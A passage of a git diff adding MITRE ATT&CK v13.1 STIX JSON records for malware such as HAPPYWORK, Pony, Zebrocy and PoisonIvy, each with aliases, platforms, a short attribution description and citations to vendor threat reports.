"2020-07-20T17:41:19.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0491", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0491" + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + }, + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "modified": "2020-10-15T02:00:29.185Z", + "name": "StrongPity", + "description": "[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68.json new file mode 100644 index 0000000000000000000000000000000000000000..d144fdb1c050f8aca279a660cce172d48056f6f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--6c9d6980-3b31-423e-8e17-7a8064c5d4bb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0214", + "external_id": "S0214" + }, + { + "source_name": "HAPPYWORK", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "FireEye APT37 Feb 2018", + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "HAPPYWORK", + "description": "[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b.json new file mode 100644 index 0000000000000000000000000000000000000000..5b0966d0fa44ed0c9879259f0e80c86324677c9e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--49c2b0e6-4a6f-45d1-b9cb-9281c0f14fc1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "PLAINTEE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0254", + "external_id": "S0254" + }, + { + "source_name": "PLAINTEE", + "description": "(Citation: Rancor Unit42 June 2018)" + }, + { + "source_name": "Rancor Unit42 June 2018", + "description": "Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + } + ], + "modified": "2020-03-30T17:15:33.608Z", + "name": "PLAINTEE", + "description": "[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--222ba512-32d9-49ac-aefd-50ce981ce2ce.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--222ba512-32d9-49ac-aefd-50ce981ce2ce.json new file mode 100644 index 0000000000000000000000000000000000000000..410b6860712b907bc2401eccce4aec16626ee3f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--222ba512-32d9-49ac-aefd-50ce981ce2ce.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--96c17320-7a4d-40f9-b3d8-fc070636dde7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Arie Olshtein, Check Point", + "Kobi Eisenkraft, Check Point" + ], + "x_mitre_aliases": [ + "Pony" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce", + "type": "malware", + "created": "2020-05-21T21:03:35.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0453", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0453" + }, + { + "source_name": "Malwarebytes Pony April 2016", + "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/", + "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020." + } + ], + "modified": "2020-06-25T21:57:40.642Z", + "name": "Pony", + "description": "[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22addc7b-b39f-483d-979a-1b35147da5de.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22addc7b-b39f-483d-979a-1b35147da5de.json new file mode 100644 index 0000000000000000000000000000000000000000..e2963117c3ed075326d55740e4a7a8b694ba0ebc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22addc7b-b39f-483d-979a-1b35147da5de.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4fae13c1-fab3-4789-bb32-62c677dfbd9f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "WinMM" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22addc7b-b39f-483d-979a-1b35147da5de", + "type": "malware", + "created": "2017-05-31T21:32:40.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0059", + "url": "https://attack.mitre.org/software/S0059", + "source_name": "mitre-attack" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "modified": "2020-03-30T18:27:57.226Z", + "name": "WinMM", + "description": "[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b.json new file mode 100644 index 0000000000000000000000000000000000000000..d5f99d8c45f6334c6117e6dfeb6ab9bd2a50fdc3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--2774b2b7-7e95-4249-add2-04c6094d7c49", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Nebulae" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b", + "type": "malware", + "created": "2021-06-30T14:44:35.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0630", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0630" + }, + { + "source_name": "Bitdefender Naikon April 2021", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf", + "description": "Vrabie, V. (2021, April 23). NAIKON \u2013 Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021." + } + ], + "modified": "2021-10-15T22:57:32.775Z", + "name": "Nebulae", + "description": "[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--234e7770-99b0-4f65-b983-d3230f76a60b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--234e7770-99b0-4f65-b983-d3230f76a60b.json new file mode 100644 index 0000000000000000000000000000000000000000..c52944f68836df3911f67705eeb5d7dd543e5a2a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--234e7770-99b0-4f65-b983-d3230f76a60b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--53dda798-eeea-43c0-a040-3ffdb08f959d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Janicab" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--234e7770-99b0-4f65-b983-d3230f76a60b", + "type": "malware", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0163", + "external_id": "S0163" + }, + { + "source_name": "Janicab", + "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.", + "url": "http://www.thesafemac.com/new-signed-malware-called-janicab/" + } + ], + "modified": "2020-03-19T18:00:00.645Z", + "name": "Janicab", + "description": "[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--98e8a977-3416-43aa-87fa-33e287e9c14c.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--98e8a977-3416-43aa-87fa-33e287e9c14c.json new file mode 100644 index 0000000000000000000000000000000000000000..6236b2a824c57251f89f953d376e87f54e05b2b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--98e8a977-3416-43aa-87fa-33e287e9c14c.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--5c34583c-76ce-4ff2-af84-0b2fd9dd6872", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c", + "type": "malware", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0155", + "external_id": "S0155" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "WINDSHIELD", + "description": "[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e.json new file mode 100644 index 0000000000000000000000000000000000000000..7d3b3e4a70622041f7df153a491e2fe5a6dc8cf3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--82cd1614-a1df-459f-8d1a-1648ad324072", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "hcdLoader" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e", + "type": "malware", + "created": "2017-05-31T21:32:46.890Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0071", + "external_id": "S0071" + }, + { + "url": "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.", + "source_name": "Dell Lateral Movement" + } + ], + "modified": "2020-03-30T18:36:37.734Z", + "name": "hcdLoader", + "description": "[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--a4f57468-fbd5-49e4-8476-52088220b92d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--a4f57468-fbd5-49e4-8476-52088220b92d.json new file mode 100644 index 0000000000000000000000000000000000000000..d2796d0f3f8e69d5dcff5ae89fdf36070a62faf1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--a4f57468-fbd5-49e4-8476-52088220b92d.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--7456d3b8-7c52-41fc-9829-f2952a546e14", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_aliases": [ + "Zebrocy", + "Zekapab" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a4f57468-fbd5-49e4-8476-52088220b92d", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0251", + "url": "https://attack.mitre.org/software/S0251", + "source_name": "mitre-attack" + }, + { + "source_name": "Zebrocy", + "description": "(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)" + }, + { + "source_name": "Zekapab", + "description": "(Citation: CyberScoop APT28 Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved November 26, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "source_name": "Unit42 Cannon Nov 2018" + }, + { + "source_name": "Unit42 Sofacy Dec 2018", + "url": "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/", + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group\u2019s Global Campaign. Retrieved April 19, 2019." + }, + { + "source_name": "CISA Zebrocy Oct 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020." + }, + { + "description": "Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.", + "url": "https://www.cyberscoop.com/apt28-brexit-phishing-accenture/", + "source_name": "CyberScoop APT28 Nov 2018" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019." + } + ], + "modified": "2021-04-23T19:45:36.003Z", + "name": "Zebrocy", + "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) ", + "x_mitre_version": "3.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--aa1462a1-d065-416c-b354-bedd04998c7f.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--aa1462a1-d065-416c-b354-bedd04998c7f.json new file mode 100644 index 0000000000000000000000000000000000000000..bc97c9c2820ede502ce45acf07c483ca23e02741 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--aa1462a1-d065-416c-b354-bedd04998c7f.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--1a1482d8-acf9-423c-bc42-d45dae2a20d7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Cobian RAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aa1462a1-d065-416c-b354-bedd04998c7f", + "type": "malware", + "created": "2019-01-29T21:40:37.350Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/software/S0338", + "source_name": "mitre-attack", + "external_id": "S0338" + }, + { + "source_name": "Cobian RAT", + "description": "(Citation: Zscaler Cobain Aug 2017)" + }, + { + "source_name": "Zscaler Cobian Aug 2017", + "url": "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", + "description": "Yadav, A., et al. (2017, August 31). Cobian RAT \u2013 A backdoored RAT. Retrieved November 13, 2018." + } + ], + "modified": "2020-03-30T15:22:42.218Z", + "name": "Cobian RAT", + "description": "[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29.json new file mode 100644 index 0000000000000000000000000000000000000000..6190b3c61d61734121deb9f2166658ec75fa9e67 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--eb708c18-e424-4148-87c4-9793e735c1e7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "OSX_OCEANLOTUS.D", + "Backdoor.MacOS.OCEANLOTUS.F" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "type": "malware", + "created": "2019-01-30T19:18:19.667Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0352", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0352" + }, + { + "source_name": "OSX_OCEANLOTUS.D", + "description": "(Citation: TrendMicro MacOS April 2018)" + }, + { + "source_name": "Backdoor.MacOS.OCEANLOTUS.F", + "description": "(Citation: Trend Micro MacOS Backdoor November 2020)" + }, + { + "description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", + "source_name": "TrendMicro MacOS April 2018" + }, + { + "source_name": "Trend Micro MacOS Backdoor November 2020", + "url": "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "description": "Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020." + } + ], + "modified": "2022-01-14T21:53:00.543Z", + "name": "OSX_OCEANLOTUS.D", + "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)", + "x_mitre_version": "2.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b42378e0-f147-496f-992a-26a49705395b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b42378e0-f147-496f-992a-26a49705395b.json new file mode 100644 index 0000000000000000000000000000000000000000..fe489ec1044cca53d11954515ee3d53947d9ebba --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--b42378e0-f147-496f-992a-26a49705395b.json @@ -0,0 +1,90 @@ +{ + "type": "bundle", + "id": "bundle--43246a01-6f7c-4c5d-98ca-34b0c376a70a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T22:03:44.669Z", + "name": "PoisonIvy", + "description": "[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Darren Spruell" + ], + "x_mitre_aliases": [ + "PoisonIvy", + "Breut", + "Poison Ivy", + "Darkmoon" + ], + "type": "malware", + "id": "malware--b42378e0-f147-496f-992a-26a49705395b", + "created": "2017-05-31T21:32:15.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0012", + "external_id": "S0012" + }, + { + "source_name": "Poison Ivy", + "description": "(Citation: FireEye Poison Ivy) (Citation: Symantec Darkmoon Sept 2014)" + }, + { + "source_name": "PoisonIvy", + "description": "(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Sept 2014)" + }, + { + "source_name": "Breut", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "Darkmoon", + "description": "(Citation: Symantec Darkmoon Sept 2014)" + }, + { + "source_name": "FireEye Poison Ivy", + "description": "FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" + }, + { + "source_name": "Symantec Darkmoon Aug 2005", + "description": "Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.", + "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99" + }, + { + "source_name": "Novetta-Axiom", + "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.", + "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf" + }, + { + "source_name": "Symantec Elderwood Sept 2012", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf" + }, + { + "source_name": "Symantec Darkmoon Sept 2014", + "description": "Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.", + "url": "https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": 